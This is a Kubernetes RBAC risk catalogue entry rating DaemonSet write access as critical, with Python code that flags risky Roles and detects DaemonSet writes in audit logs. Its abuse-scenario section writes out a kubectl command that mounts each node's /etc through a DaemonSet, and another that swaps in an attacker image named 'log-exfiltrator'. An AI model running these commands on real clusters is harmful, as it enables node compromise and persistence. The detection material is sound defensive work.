Manage DaemonSets in a namespace (runs on nodes, high impact)
Elevation of Privilege
Critical
Overview
Field | Value |
---|---|
ID | 1036 |
Name | Manage DaemonSets in a namespace (runs on nodes, high impact) |
Risk Category | Elevation of Privilege |
Risk Level | Critical |
Role Type | Role |
API Groups | apps |
Resources | daemonsets |
Verbs | create, update, patch, delete |
Tags | NodeAccess, Persistence, PrivilegeEscalation, Tampering, WorkloadLifecycle |
Description
Allows creating, updating, patching, or deleting DaemonSets within a specific namespace. Even though the grant is namespaced, a DaemonSet schedules one pod on every node that matches its selector (by default, every node in the cluster, including nodes that join later), so its reach is cluster-wide. If the pods it deploys are privileged or mount host paths, this can lead to node compromise, privilege escalation, and persistence, since the DaemonSet controller keeps re-creating the pod on each node.
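A static check for this entry, added here as an example and not part of the catalogue's own tooling: given a Role (or ClusterRole) manifest as a dictionary, it reports which of the DaemonSet write verbs the rules grant, handling the `*` wildcard in apiGroups, resources and verbs. Both Role manifests in the block are constructed for the example.

```python
"""Added example, not the catalogue's own tooling: a static RBAC check that
flags a Role whose rules match this entry (apps/daemonsets with any of
create, update, patch, delete). Both Role manifests below are constructed."""

RISK_ID = 1036
DAEMONSET_WRITE_VERBS = {"create", "update", "patch", "delete"}

# Constructed: a namespaced "deployer" Role that also carries DaemonSet write verbs.
SAMPLE_ROLE = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",
    "metadata": {"name": "ns-deployer", "namespace": "monitoring"},
    "rules": [
        {"apiGroups": ["apps"], "resources": ["deployments", "daemonsets"],
         "verbs": ["get", "list", "create", "patch"]},
        {"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]},
    ],
}

# Constructed: read-only access to DaemonSets, which this entry does not cover.
READ_ONLY_ROLE = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",
    "metadata": {"name": "ns-viewer", "namespace": "monitoring"},
    "rules": [
        {"apiGroups": ["apps"], "resources": ["daemonsets"],
         "verbs": ["get", "list", "watch"]},
    ],
}


def _covers(values, wanted):
    """RBAC list fields match either literally or through the "*" wildcard."""
    return "*" in values or wanted in values


def daemonset_write_verbs(role):
    """Return the DaemonSet write verbs granted by any rule in the Role.

    A rule counts when apiGroups covers "apps" and resources covers
    "daemonsets". Verbs from all matching rules are unioned because RBAC rules
    are purely additive; a "*" verb grants the whole write set.
    """
    granted = set()
    for rule in role.get("rules", []):
        if not _covers(rule.get("apiGroups", []), "apps"):
            continue
        if not _covers(rule.get("resources", []), "daemonsets"):
            continue
        verbs = set(rule.get("verbs", []))
        if "*" in verbs:
            return set(DAEMONSET_WRITE_VERBS)
        granted |= verbs & DAEMONSET_WRITE_VERBS
    return granted


def finding(role):
    """One-line finding in the catalogue's ID/level style, or None if clean."""
    verbs = daemonset_write_verbs(role)
    if not verbs:
        return None
    meta = role.get("metadata", {})
    return (f"[{RISK_ID}][Critical] {role.get('kind', 'Role')} "
            f"{meta.get('namespace', '-')}/{meta.get('name', '?')} grants "
            f"apps/daemonsets: {', '.join(sorted(verbs))}")


if __name__ == "__main__":
    for role in (SAMPLE_ROLE, READ_ONLY_ROLE):
        print(finding(role))
```

To run it against a live cluster, feed each item of `kubectl get roles,clusterroles -A -o json` to `finding`; the rule matching is the same for ClusterRoles, which carry the same risk when bound into a namespace. The check only answers whether the grant exists; whether the resulting pods can actually reach the node depends on what admission control allows in that namespace (Pod Security Admission at the `baseline` level already rejects hostPath volumes and privileged containers).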
Abuse Scenarios
- Create a new DaemonSet with hostPath access in the namespace.

```shell
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hostpath-daemonset
spec:
  selector:
    matchLabels:
      app: hostpath-ds
  template:
    metadata:
      labels:
        app: hostpath-ds
    spec:
      containers:
      - name: hostpath-container
        image: busybox
        command: ["/bin/sh", "-c", "sleep infinity"]
        volumeMounts:
        - mountPath: /host-etc
          name: host-etc
      volumes:
      - name: host-etc
        hostPath:
          path: /etc
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```

- Update an existing DaemonSet’s image to a malicious one.

```shell
kubectl set image daemonset/<daemonset-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image daemonset/my-logging-agent agent=attacker/log-exfiltrator -n monitoring
```
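Both scenarios above leave a trace in the API-server audit log. The following detection logic is an added example, not tooling from the catalogue: it reads `audit.k8s.io/v1` events as JSON lines, keeps completed write requests against `apps/daemonsets`, and raises the severity when the submitted pod template asks for host access (hostPath volumes, privileged containers, hostPID/hostNetwork/hostIPC). The three events are constructed to mirror the two scenarios plus a harmless `list`; the `critical`/`high` labels are the example's own choice.

```python
"""Added example, not the catalogue's own tooling: detect DaemonSet writes in
API-server audit logs (audit.k8s.io/v1 JSON lines) and raise the severity when
the submitted pod template asks for host access. All events are constructed."""
import json

WRITE_VERBS = {"create", "update", "patch", "delete"}

# Constructed events, mirroring the two scenarios above plus a harmless list.
# requestObject/responseObject are present only at audit level RequestResponse.
AUDIT_LINES = [
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
        "verb": "create", "user": {"username": "system:serviceaccount:monitoring:ci-deployer"},
        "objectRef": {"resource": "daemonsets", "apiGroup": "apps",
                      "namespace": "monitoring", "name": "hostpath-daemonset"},
        "responseStatus": {"code": 201},
        "requestObject": {"spec": {"template": {"spec": {
            "containers": [{"name": "hostpath-container", "image": "busybox"}],
            "volumes": [{"name": "host-etc", "hostPath": {"path": "/etc"}}]}}}},
    }),
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
        "verb": "patch", "user": {"username": "alice@example.com"},
        "objectRef": {"resource": "daemonsets", "apiGroup": "apps",
                      "namespace": "monitoring", "name": "my-logging-agent"},
        "responseStatus": {"code": 200},
        "responseObject": {"spec": {"template": {"spec": {
            "containers": [{"name": "agent", "image": "registry.example/agent:2.0"}]}}}},
    }),
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
        "verb": "list", "user": {"username": "alice@example.com"},
        "objectRef": {"resource": "daemonsets", "apiGroup": "apps", "namespace": "monitoring"},
        "responseStatus": {"code": 200},
    }),
]


def host_access_indicators(pod_spec):
    """Settings that let a DaemonSet pod reach the node it runs on."""
    found = [k for k in ("hostPID", "hostNetwork", "hostIPC") if pod_spec.get(k)]
    for vol in pod_spec.get("volumes") or []:
        if vol.get("hostPath") is not None:
            found.append("hostPath:" + str((vol["hostPath"] or {}).get("path", "?")))
    containers = (pod_spec.get("containers") or []) + (pod_spec.get("initContainers") or [])
    for c in containers:
        if (c.get("securityContext") or {}).get("privileged"):
            found.append("privileged:" + c.get("name", "?"))
    return found


def daemonset_write_findings(lines):
    """One finding per completed DaemonSet write, with the actor and any host-access flags."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        ref = ev.get("objectRef") or {}
        # Each request logs twice (RequestReceived, ResponseComplete); keep the final stage.
        if ev.get("stage") != "ResponseComplete":
            continue
        if ref.get("apiGroup") != "apps" or ref.get("resource") != "daemonsets":
            continue
        if ev.get("verb") not in WRITE_VERBS:
            continue
        # For patch, requestObject is only the patch body; prefer the full responseObject.
        obj = ev.get("responseObject") or ev.get("requestObject") or {}
        pod_spec = (((obj.get("spec") or {}).get("template") or {}).get("spec") or {})
        indicators = host_access_indicators(pod_spec)
        findings.append({
            "user": (ev.get("user") or {}).get("username", "?"),
            "verb": ev["verb"],
            "namespace": ref.get("namespace"),
            "name": ref.get("name"),
            "status": (ev.get("responseStatus") or {}).get("code"),
            "severity": "critical" if indicators else "high",
            "indicators": indicators,
        })
    return findings


if __name__ == "__main__":
    for f in daemonset_write_findings(AUDIT_LINES):
        print(f)
```

Every DaemonSet write is reported, even a plain image change, because the scenario above shows that swapping the image alone is enough to run attacker-chosen code on every node; the host-access indicators only decide how loudly to alert. Denied requests (status 403) are kept as well, since they show who is probing for this permission. For the indicators to be populated, the audit policy must log `daemonsets` at the `RequestResponse` level; at `Metadata` level only the actor, verb and object are available.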